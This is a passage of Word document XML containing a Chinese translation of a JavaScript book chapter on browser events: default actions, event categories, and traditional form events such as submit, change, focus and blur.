        <w:t>会展示如何实现这种能力。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一些事件有与之相关的默认操作。例如，当超链接上发生</w:t>
      </w:r>
      <w:r>
        <w:t>click</w:t>
      </w:r>
      <w:r>
        <w:t>事件时，浏览器的默认操作是按照链接加载新页面。事件处理程序可以通过返回一个适当的值、调用事件对象的某个方法或设置事件对象的某</w:t>
      </w:r>
      <w:r>
        <w:t>个属性来阻止默认操作的发生。这有时称为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>取消</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>事件，</w:t>
      </w:r>
      <w:r>
        <w:t>17.3.6</w:t>
      </w:r>
      <w:r>
        <w:t>节会介绍它。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>有了这些定义好的术语，现在我们能继续深入学习事件和事件处理。</w:t>
      </w:r>
      <w:r>
        <w:t>17.1</w:t>
      </w:r>
      <w:r>
        <w:t>节会概述浏览器支持的许多事件类型。它没有介绍任何单个事件的详细信息，而是告诉大家</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用中有哪些事件类型可</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>以使用。这一节交叉引用了本书的其他部分内容，用于演示一些事件实战。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>17.1</w:t>
      </w:r>
      <w:r>
        <w:t>节之后，接着两节会介绍如何注册事件处理程序和浏览器如何调用这些事件处理程序。由于</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>事件模型的历史演变和</w:t>
      </w:r>
      <w:r>
        <w:t>IE 9</w:t>
      </w:r>
      <w:r>
        <w:t>之前版本缺乏对标准的支持，因此这两个主题可能会超出想</w:t>
      </w:r>
      <w:r>
        <w:t>象的复杂。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>本章后面会演示特定事件类型如何工作的示例，这些特定事件类型包括：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>文档加载和准备就绪事件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>鼠标事件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>鼠标滚轮事件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>拖放事件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>键盘事件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>文本输入事件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="424" w:name="17_1_Shi_Jian_Lei_Xing_"/>
      <w:r>
        <w:t>17.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　事件类型</w:t>
      </w:r>
      <w:bookmarkEnd w:id="424"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">We </w:t>
      </w:r>
      <w:r>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:t>初期，客户端程序员只能使用少部分事件，比如</w:t>
      </w:r>
      <w:r>
        <w:t>"load"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"click"</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>"mouseover"</w:t>
      </w:r>
      <w:r>
        <w:t>等。这些传统事件类型在所有浏览器中都得到了很好的支持，</w:t>
      </w:r>
      <w:r>
        <w:t>17.1.1</w:t>
      </w:r>
      <w:r>
        <w:t>节主要介绍这些内容。随着</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>平台发展到包括更强大的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，事件集合随之越来越大，没有单个标准能定义完整的事件集合。在写本章时，浏览器所支持的事件数量正在快速地增长，这些新事件有</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>个来源：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·3</w:t>
      </w:r>
      <w:r>
        <w:t>级</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>事件（</w:t>
      </w:r>
      <w:r>
        <w:t>DOM Level 3 Events</w:t>
      </w:r>
      <w:r>
        <w:t>）规范，经过长期的停滞之后，在</w:t>
      </w:r>
      <w:r>
        <w:t>W3C</w:t>
      </w:r>
      <w:r>
        <w:t>的主持下又开始焕发生机。</w:t>
      </w:r>
      <w:r>
        <w:t>17.1.2</w:t>
      </w:r>
      <w:r>
        <w:t>节介绍</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>事件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>规</w:t>
      </w:r>
      <w:r>
        <w:t>范及相关衍生规范的大量新</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>定义了新事件，比如历史管理、拖放、跨文档通信，以及视频和音频的播放。</w:t>
      </w:r>
      <w:r>
        <w:t>17.1.3</w:t>
      </w:r>
      <w:r>
        <w:t>节会概述这些事件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>基于触摸和支持</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的移动设备的出现，比如</w:t>
      </w:r>
      <w:r>
        <w:t>iPhone</w:t>
      </w:r>
      <w:r>
        <w:t>，它们需要定义新的触摸和手势事件类型。在</w:t>
      </w:r>
      <w:r>
        <w:t>17.1.4</w:t>
      </w:r>
      <w:r>
        <w:t>节会看到一些针对</w:t>
      </w:r>
      <w:r>
        <w:t>Apple</w:t>
      </w:r>
      <w:r>
        <w:t>产品的例子。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意，许多新事件类型尚未广泛实现，定义它们的标准也依旧处于草案阶段。接下来的几节将概述这些事件，但不会列出详细信息。本章剩下的部分将全面涵盖事件处理模型，及大量已经得到良</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>好支持的事件应用示例。如果大概理解了事件的工作原理</w:t>
      </w:r>
      <w:r>
        <w:t>，那么就能轻松地处理作为新</w:t>
      </w:r>
      <w:r>
        <w:t>Web API</w:t>
      </w:r>
      <w:r>
        <w:t>定义和实现的新事件类型。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para07"/>
      </w:pPr>
      <w:r>
        <w:t>事件分类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>事件大致可以分成几类，了解这些分类将有助于理解和组织如下长长的事件列表：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>依赖于设备的输入事件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>有些事件和特定输入设备直接相关，比如鼠标和键盘。包括诸如</w:t>
      </w:r>
      <w:r>
        <w:t>"mousedown"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"mousemove"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"mouseup"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"keydown"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"keypress"</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>"keyup"</w:t>
      </w:r>
      <w:r>
        <w:t>这样的传统事件类型，也包括像</w:t>
      </w:r>
      <w:r>
        <w:t>"touchmove"</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>"gesturechange"</w:t>
      </w:r>
      <w:r>
        <w:t>这样新的触摸事件类型。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>独立于设备的输入事件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>有些输入事件没有直接相关的特定输入设备。例如，</w:t>
      </w:r>
      <w:r>
        <w:t>click</w:t>
      </w:r>
      <w:r>
        <w:t>事件表示激活了链接、按钮或其他文档元素，这通常是通过鼠标单击实现，但也能通过键盘或触摸感知设备上的手势来实现。尚未广泛实现的</w:t>
      </w:r>
      <w:r>
        <w:t>textinput</w:t>
      </w:r>
      <w:r>
        <w:t>事件就是一个独立于设备的输入事件，它既能取代按键事件并支持键盘输入，也可以取代剪切和粘贴与手写识别的事件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>用户界面事件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>用户界面事件是较高级的事件，通常出现在定义</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用用户界面的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>表单元素上。包括文本输入域获取键盘焦点的</w:t>
      </w:r>
      <w:r>
        <w:t>focus</w:t>
      </w:r>
      <w:r>
        <w:t>事件、用户改变表单元素显示值的</w:t>
      </w:r>
      <w:r>
        <w:t>change</w:t>
      </w:r>
      <w:r>
        <w:t>事件和用户单击表单中的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>提交</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>按钮的</w:t>
      </w:r>
      <w:r>
        <w:t>submit</w:t>
      </w:r>
      <w:r>
        <w:t>事件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>状态变化事件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>有些事件不是由用户活动而是由网络或浏览器活动触发，用来表示某种生命周期或相关状态的变化。当文档完全加载时，在</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象上会发生</w:t>
      </w:r>
      <w:r>
        <w:t>load</w:t>
      </w:r>
      <w:r>
        <w:t>事件，这可能是这类事件中最常用的。在</w:t>
      </w:r>
      <w:r>
        <w:t>13.3.4</w:t>
      </w:r>
      <w:r>
        <w:t>节讨论过的</w:t>
      </w:r>
      <w:r>
        <w:t>DOMContentLoaded</w:t>
      </w:r>
      <w:r>
        <w:t>事件与此类似。</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>历史管理机制会（见</w:t>
      </w:r>
      <w:r>
        <w:t>22.2</w:t>
      </w:r>
      <w:r>
        <w:t>节）触发</w:t>
      </w:r>
      <w:r>
        <w:t>popstate</w:t>
      </w:r>
      <w:r>
        <w:t>事件来响应浏览器的后退按钮。</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>离线</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>（见</w:t>
      </w:r>
      <w:r>
        <w:t>20.4</w:t>
      </w:r>
      <w:r>
        <w:t>节）包括</w:t>
      </w:r>
      <w:r>
        <w:t>online</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>offline</w:t>
      </w:r>
      <w:r>
        <w:t>事件。第</w:t>
      </w:r>
      <w:r>
        <w:t>18</w:t>
      </w:r>
      <w:r>
        <w:t>章将展示当向服务器请求的数据准备就绪时，如何利用</w:t>
      </w:r>
      <w:r>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>eadystatechange</w:t>
      </w:r>
      <w:r>
        <w:t>事件得到通知。类似地，用于读取用户选择本地文件的新</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>（见</w:t>
      </w:r>
      <w:r>
        <w:t>22.6.5</w:t>
      </w:r>
      <w:r>
        <w:t>节）使用像</w:t>
      </w:r>
      <w:r>
        <w:t>"loadstart"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"progress"</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>"loadend"</w:t>
      </w:r>
      <w:r>
        <w:t>事件来实现</w:t>
      </w:r>
      <w:r>
        <w:t>I/O</w:t>
      </w:r>
      <w:r>
        <w:t>过程的异步通知。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>特定</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>事件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>及相关规范定义的大量</w:t>
      </w:r>
      <w:r>
        <w:t>Web API</w:t>
      </w:r>
      <w:r>
        <w:t>都有自己的事件类型。拖放</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>（见</w:t>
      </w:r>
      <w:r>
        <w:t>17.7</w:t>
      </w:r>
      <w:r>
        <w:t>节）定义了诸如</w:t>
      </w:r>
      <w:r>
        <w:t>"dragstart"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"dragenter"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"dragover"</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>"drop"</w:t>
      </w:r>
      <w:r>
        <w:t>事件，应用程序想自定义拖放源（</w:t>
      </w:r>
      <w:r>
        <w:t>drag source</w:t>
      </w:r>
      <w:r>
        <w:t>）或拖放目标（</w:t>
      </w:r>
      <w:r>
        <w:t>drop target</w:t>
      </w:r>
      <w:r>
        <w:t>）就必须处理这些</w:t>
      </w:r>
      <w:r>
        <w:t>相关事件。</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>的＜</w:t>
      </w:r>
      <w:r>
        <w:t>video</w:t>
      </w:r>
      <w:r>
        <w:t>＞和＜</w:t>
      </w:r>
      <w:r>
        <w:t>audio</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素（见</w:t>
      </w:r>
      <w:r>
        <w:t>21.2</w:t>
      </w:r>
      <w:r>
        <w:t>节）定义一长串像</w:t>
      </w:r>
      <w:r>
        <w:t>"waiting"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"playing"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"seeking"</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>"volumechange"</w:t>
      </w:r>
      <w:r>
        <w:t>等相关事件，这些事件通常仅用于</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用，这些</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用希望为视频和音频的播放定义自定义控件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>计时器和错误处理程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>已经在第</w:t>
      </w:r>
      <w:r>
        <w:t>14</w:t>
      </w:r>
      <w:r>
        <w:t>章介绍过的计时器（</w:t>
      </w:r>
      <w:r>
        <w:t>timer</w:t>
      </w:r>
      <w:r>
        <w:t>）和错误处理程序（</w:t>
      </w:r>
      <w:r>
        <w:t>error handler</w:t>
      </w:r>
      <w:r>
        <w:t>）属于客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>异步编程模型的部分，并有相似的事件。虽然本章不会讨论计时器和错误处理程序，但思考它们同事件处理之间的关系是</w:t>
      </w:r>
      <w:r>
        <w:t>有益的，所以在本章的语境中重读</w:t>
      </w:r>
      <w:r>
        <w:t>14.1</w:t>
      </w:r>
      <w:r>
        <w:t>节和</w:t>
      </w:r>
      <w:r>
        <w:t>14.6</w:t>
      </w:r>
      <w:r>
        <w:t>节会发现很有趣。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="425" w:name="17_1_1_Chuan_Tong_Shi_Jian_Lei_Xing_"/>
      <w:r>
        <w:t>17.1.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　传统事件类型</w:t>
      </w:r>
      <w:bookmarkEnd w:id="425"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>处理鼠标、键盘、</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>表单和</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的事件都是</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用中最常用的，它们已经存在很长的时间并得到了广泛的支持。接下来会说明这类事件的许多重要详细信息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para08"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:t>表单事件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>回到</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的早期，表单和超链接都是网页中最早支持脚本的元素。这就意味着表单事件是所有事件类型中最稳定且得到良好支持的那部分。当提交表单和重置表单时，＜</w:t>
      </w:r>
      <w:r>
        <w:t>form</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素会分别触发</w:t>
      </w:r>
      <w:r>
        <w:t>submit</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>reset</w:t>
      </w:r>
      <w:r>
        <w:t>事件。当用户和类按钮</w:t>
      </w:r>
      <w:r>
        <w:t>表单元素（包括单选按钮和复选框）交互时，它们会发生</w:t>
      </w:r>
      <w:r>
        <w:t>click</w:t>
      </w:r>
      <w:r>
        <w:t>事件。当用户通过输入文字、选择选项或选择复选框来改变相应表单元素的状态时，这些通常维护某种状态的表单元素会触发</w:t>
      </w:r>
      <w:r>
        <w:t>change</w:t>
      </w:r>
      <w:r>
        <w:t>事件。对于文本输入域，只有用户和表单元素完成交互并通过</w:t>
      </w:r>
      <w:r>
        <w:t>Tab</w:t>
      </w:r>
      <w:r>
        <w:t>键或单击的方式移动焦点到其他元素上时才会触发</w:t>
      </w:r>
      <w:r>
        <w:t>change</w:t>
      </w:r>
      <w:r>
        <w:t>事件。响应通过键盘改变焦点的表单元素在得到和失去焦点时会分别触发</w:t>
      </w:r>
      <w:r>
        <w:t>focus</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>blur</w:t>
      </w:r>
      <w:r>
        <w:t>事件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>15.9.3</w:t>
      </w:r>
      <w:r>
        <w:t>节涵盖了所有表单相关事件的详细信息。不过，这里还有一些进一步说明。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>通过事件处理程序能取消</w:t>
      </w:r>
      <w:r>
        <w:t>submit</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>res</w:t>
      </w:r>
      <w:r>
        <w:t>et</w:t>
      </w:r>
      <w:r>
        <w:t>事件的默认操作，某些</w:t>
      </w:r>
      <w:r>
        <w:t>click</w:t>
      </w:r>
      <w:r>
        <w:t>事件也是如此。</w:t>
      </w:r>
      <w:r>
        <w:t>focus</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>blur</w:t>
      </w:r>
      <w:r>
        <w:t>事件不会冒泡，但其他所有表单事件都可以。</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>定义了</w:t>
      </w:r>
      <w:r>
        <w:t>focusin</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>focusout</w:t>
      </w:r>
      <w:r>
        <w:t>事件可以冒泡，它们可以用于替代</w:t>
      </w:r>
      <w:r>
        <w:t>foucs</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>blur</w:t>
      </w:r>
      <w:r>
        <w:t>事件。</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>库（见第</w:t>
      </w:r>
      <w:r>
        <w:t>19</w:t>
      </w:r>
      <w:r>
        <w:t>章）为不支持</w:t>
      </w:r>
      <w:r>
        <w:t>focusin</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>focusout</w:t>
      </w:r>
      <w:r>
        <w:t>事件的浏览器模拟了这两个事件，同时</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>级</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
